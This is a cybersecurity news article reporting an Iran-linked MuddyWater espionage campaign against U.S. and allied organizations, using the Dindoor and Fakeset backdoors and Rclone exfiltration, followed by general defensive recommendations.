Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor

Cybersecurity researchers have uncovered a targeted cyber-espionage campaign conducted by the Iran-linked threat group MuddyWater, which has infiltrated multiple organizations across the United States and allied countries. The operation targeted sectors considered strategically significant, including financial institutions, aviation infrastructure, non-profit organizations, and a software company connected to the defense and aerospace industry. The activity highlights how state-aligned threat actors continue to focus on high-value corporate networks and critical infrastructure environments.

The campaign is believed to be connected to Ministry of Intelligence and Security, which has historically used MuddyWater as a cyber-espionage unit to support intelligence collection and geopolitical objectives. Over the years, the group has become known for long-term intrusion campaigns that rely on a mixture of custom malware, open-source tools, and legitimate cloud services to maintain persistence while minimizing detection.

Researchers observed that the campaign began in early 2026 and involved the deployment of both new and previously documented backdoors. Among the reported victims were a U.S. airport, a U.S. bank, a Canadian non-profit organization, and a software provider supporting defense-related customers. The timing of the activity has raised concern among analysts, as it coincided with heightened geopolitical tensions involving Iran and Western nations.

For advanced persistent threat groups, gaining access to strategic organizations is rarely about immediate disruption. Instead, it is about positioning which is quietly embedding themselves within networks to gather intelligence and prepare for potential future operations.

A New Backdoor Emerges: Dindoor

During incident response investigations, researchers identified a previously undocumented backdoor called Dindoor deployed across several compromised systems. The malware provides attackers with persistent remote access and allows them to execute commands or deploy additional payloads on infected machines.

One unusual aspect of Dindoor is that it is built using the Deno runtime environment, a platform capable of executing JavaScript and TypeScript outside of a browser. The use of this runtime is relatively uncommon in malware development and may help the attackers evade traditional detection methods that focus primarily on more familiar scripting environments.

The backdoor was discovered on networks belonging to a U.S. financial institution, a Canadian non-profit organization, and a software company tied to the defense and aerospace sector. Once deployed, it enables the attackers to maintain ongoing access to compromised systems while issuing commands from remote command-and-control infrastructure.

For defenders, the appearance of new malware variants such as Dindoor illustrates how state-aligned groups continue to adapt their tooling to bypass security monitoring.

Reusing Familiar Tools: The Fakeset Backdoor

In addition to Dindoor, investigators also discovered the use of another malware family known as Fakeset, a Python-based backdoor previously associated with MuddyWater operations. Fakeset allows attackers to establish persistent communication with command-and-control servers, execute arbitrary system commands, and download additional malicious payloads. The malware can also facilitate reconnaissance activities, enabling attackers to map network environments and identify valuable assets.

This backdoor was identified within networks belonging to a U.S. airport and a non-profit organization. The presence of multiple malware families across different victims suggests that the attackers tailor their tooling depending on the target environment.

Such flexibility is typical of advanced persistent threat groups, which often combine custom malware with adaptable open-source frameworks to maintain long-term access.

Living off the Land for Data Exfiltration

Beyond deploying custom backdoors, the attackers relied heavily on legitimate system tools to conduct data exfiltration. One utility observed during the investigation was Rclone, a command-line tool commonly used for transferring files to cloud storage services. Once inside the network, the attackers attempted to collect sensitive data from compromised systems, compress the files, and transfer them to a cloud storage bucket hosted on Wasabi Technologies. By using Rclone to move data into cloud storage, the attackers could blend malicious activity with legitimate network traffic.

This technique, often referred to as Living-off-the-Land (LotL), allows threat actors to avoid deploying additional malware that might trigger security alerts. Instead, they rely on legitimate tools that administrators themselves might use, making detection far more difficult. The strategy reflects a growing trend in advanced cyber operations where stealth and persistence take priority over speed or visibility.

Strategic Targeting of Critical Organizations

The campaign involved intrusions across several strategically important organizations, including a U.S. airport, a financial institution, a Canadian non-profit organization, and a software provider connected to the defense and aerospace sector.

Researchers believe that attackers had already established access to several of these networks before the campaign was publicly identified. This indicates that the threat actors may have been quietly conducting reconnaissance and intelligence gathering for an extended period of time. The timing of the attacks also appears significant. The intrusions occurred during a period of increased geopolitical tension involving Iran, the United States, and Israel. Security analysts believe the attackers may have been attempting to pre-position themselves within key organizations to collect intelligence or prepare for potential cyber operations in the future.

Such long-term positioning is a hallmark of nation-state cyber operations, where persistence inside strategic networks can provide both intelligence advantages and operational leverage.

The Real Impact: Intelligence and Strategic Positioning

The primary objective of this campaign appears to be cyber-espionage rather than immediate disruption. By infiltrating organizations connected to aviation, finance, and defense-related technologies, the attackers gain access to sensitive operational and strategic information.

With persistent access, threat actors may collect internal corporate documents, proprietary technology, financial data, and confidential communications. This information can support intelligence gathering, economic advantage, or future cyber operations. The presence of attackers within critical infrastructure environments also raises concerns about potential future disruptions. Even if the current campaign focuses on espionage, the same access could be leveraged for destructive or disruptive activities if geopolitical conditions escalate.

For organizations operating in sensitive sectors, this type of long-term infiltration represents one of the most serious cybersecurity risks.

Strengthening Defenses Against APT Activity

Defending against advanced persistent threat groups requires more than basic security controls. Organizations must adopt a layered defense strategy focused on detection, monitoring, and rapid response.

Endpoint Detection and Response (EDR) solutions should be deployed to identify suspicious command execution, unusual scripting activity, and abnormal outbound connections. Monitoring the use of legitimate administrative tools especially utilities capable of transferring large volumes of data is equally important.

Network segmentation can also significantly reduce risk. By isolating critical infrastructure systems from general corporate networks, organizations can limit an attacker’s ability to move laterally after gaining initial access. Security teams should also conduct proactive threat hunting activities, searching for indicators such as unexpected persistence mechanisms, abnormal network traffic patterns, or unauthorized cloud synchronization tools operating inside the environment. Combined with strong identity protections, including multi-factor authentication and strict least-privilege access policies, these measures can significantly reduce the effectiveness of APT campaigns.

A Persistent Threat in the Modern Cyber Landscape

The activity attributed to MuddyWater demonstrates how state-sponsored cyber operations increasingly focus on infiltration and long-term intelligence gathering rather than immediate disruption. By quietly embedding themselves within critical organizations, attackers can monitor systems, collect sensitive information, and prepare for future cyber operations if geopolitical tensions escalate.

The use of custom backdoors such as Dindoor and Fakeset, combined with stealthy data exfiltration techniques using legitimate tools like Rclone, illustrates the evolving sophistication of modern cyber-espionage campaigns. For organizations operating in sectors such as aviation, finance, and defense-related industries, these developments serve as a clear warning. Advanced adversaries are not only targeting vulnerabilities but also they are targeting strategic access. Strengthening monitoring capabilities, implementing strict access controls, and maintaining a proactive incident response posture remain essential steps in defending against persistent and well-resourced threat actors.

Reference

1. https://thehackernews.com/2026/03/iran-linked-muddywater-hackers-target.html

2. https://www.cybersecuritydive.com/news/state-linked-actors-targeted-us-networks-in-lead-up-to-iran-war/814190/

3. https://cybersecuritynews.com/iran-linked-hackers-target-u-s-critical-infrastructure/#google_vignette

4. https://www.cybersecurity-help.cz/blog/5281.html

5. https://www.infosecurity-magazine.com/news/iran-muddywater-hackers-us-firms/

6. https://www.securityweek.com/iranian-apt-hacks-us-airport-bank-software-company/